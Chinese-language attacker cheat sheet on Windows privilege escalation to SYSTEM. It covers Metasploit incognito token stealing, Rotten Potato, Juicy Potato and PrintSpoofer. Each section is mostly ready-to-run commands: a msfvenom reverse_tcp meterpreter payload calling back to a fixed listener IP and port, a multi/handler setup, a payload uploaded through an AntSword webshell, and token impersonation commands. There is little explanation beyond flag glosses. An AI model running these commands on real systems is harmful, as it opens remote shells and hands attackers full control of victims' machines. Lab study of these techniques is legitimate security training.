MSF提权
管理员权限——>system
条件:有以下两个权限,一般为管理员组成员(在蚁剑的终端用 whoami /priv 查看)
SelmpersonatePrivilege(模拟客户端权限)
SeAssignPrimaryTokenPrivilege / SelncreaseQuotaPrivilege(替换进程级访问令牌权限)
步骤:
#在kali生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.129 lport=8888 -f exe -o payload.exe
#将木马上传到目标服务器并执行#在msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888
run
#在蚁剑查看当前用户及其权限
whoami
net user xue
whoami /priv
#MSF#加载 incognito 模块
load incognito
#列出主机上的所有访问令牌
list_tokens -u
#窃取 NT AUTHORITY\SYSTEM 账户的令牌
impersonate_token "NT AUTHORITY\SYSTEM"#从指定的进程窃取令牌
steal_token PID#退回之前的令牌
rev2self
#查看当前权限
getuid
Rotten Potato提权
普通用户——>system
条件:有SelmpersonatePrivilege(模拟客户端权限)
#在kali生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.129 lport=8888 -f exe -o payload.exe
#将木马上传到目标服务器并执行#在msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888
run#向目标主机上传rottenpotato.exe
#执行rottenpotato.exe
execute -Hc -f rottenpotato.exe
#列出主机上的所有访问令牌
list_tokens -u
#窃取 NT AUTHORITY\SYSTEM 账户的令牌
impersonate_token "NT AUTHORITY\SYSTEM"
Juicy Potato提权
普通用户——>system
条件:有SelmpersonatePrivilege(模拟客户端权限)
#将JuicyPotato.exe和MSF生成的payload.exe上传到目标服务器
#在https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md上查找要加载的COM对象的CLSID
#在msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888
run
#在AntSword上执行提权命令
JuicyPotato.exe -t t -p payload.exe -l 8888 -n 135 -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
注释:
# -t,指定要使用CreateProcesswithTokenW和CreateProcessAsUserA()中的哪个函数
# -p,指定要运行的程序
# -l,指定COM对象加载的端口
# -n,指定本地RPC服务端口,默认为135
# -c,指定要加载的COM对象的CLSID
根据操作系统版本选择一个可用的COM对象。在Rotten Potato中使用的 COM 对象为BITS,而Juicy Potato为不同 Windows 版本提供了多个可以利用的COM对象
Pipe Potato提权
普通用户——>system
条件:有SelmpersonatePrivilege(模拟客户端权限)
#将PrintSpoofer64.exe和MSF生成的payload.exe上传到目标服务器
#在msf上设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888
run
#在蚁剑上提权
PrintSpoofer64.exe -i -c payload.exe
注释:
#原理:PrintSpoofer64.exe -i -c [命令]
以system的权限执行命令,利用了打印机组件路径检查中存在的一个Bug